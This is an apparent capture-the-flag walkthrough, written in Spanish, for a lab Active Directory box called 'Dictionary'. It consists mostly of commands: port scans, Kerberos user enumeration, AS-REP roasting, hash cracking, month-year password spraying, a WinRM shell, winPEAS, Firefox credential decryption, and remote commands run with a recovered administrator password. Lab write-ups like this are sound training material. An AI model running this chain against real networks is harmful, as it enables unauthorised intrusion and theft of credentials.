echo "172.31.3.4 Dictionary.csl" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 172.31.3.4 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA dictionary 172.31.3.4

nmap -sU -O -p- -oA dictionary-udp 172.31.3.4

smbclient -L \\\\172.31.3.4\\

Pasted image 20210706084307.png

nmap -n -sV --script "ldap* and not brute" -p 389 172.31.3.4

https://book.hacktricks.xyz/windows/active-directory-methodology

Pasted image 20210706090804.png

Creamos un archivo llamado users con izabel

./kerbrute_linux_amd_64 userenum -d Dictionary.csl --dc Dictionary.csl /usr/share/seclists/Username/xato-net-10-million-usernames.txt

Pasted image 20210706093911.png

python3 /opt/impacket/examples/GetNPUsers.py Dictionary.csl/ -userfile users -format john -outputfile dictionaryhashes

Pasted image 20210706092304.png

Pasted image 20210706092558.png

john --wordlist=/usr/share/wordlists/rockyou.txt dictionaryhashes

Pasted image 20210706092831.png

rpcclient -u "izabel" 172.31.3.4

Pasted image 20210706093608.png

enumdomusers

Pasted image 20210706093724.png

Agregamos los usuarios en el archivo users

Creamos un script para hacer contraseñas con el mes y el año

Pasted image 20210706121041.png

python3 month_year.py > passwords

crackmapexec smb 172.31.3.4 -u users -p passwords

Pasted image 20210706121613.png

evil-winrm -i 172.31.3.4 -u BACKUP-Izabel -p October2019

Pasted image 20210706122136.png

upload winPEASany.exe

. .\winPEASany.exe

Pasted image 20210706122612.png

python3 /opt/firefox_decrypt/firefox_decrypt.py /home/kali/Desktop/boxes/dictionary

Pasted image 20210706131246.png

crackmapexec winrm 172.31.3.4 -u Administrator -p kC7pbrQAsTT -x 'whoami'

Pasted image 20210706131607.png

boxes

copyright©2022 Cu3rv0x all rights reserved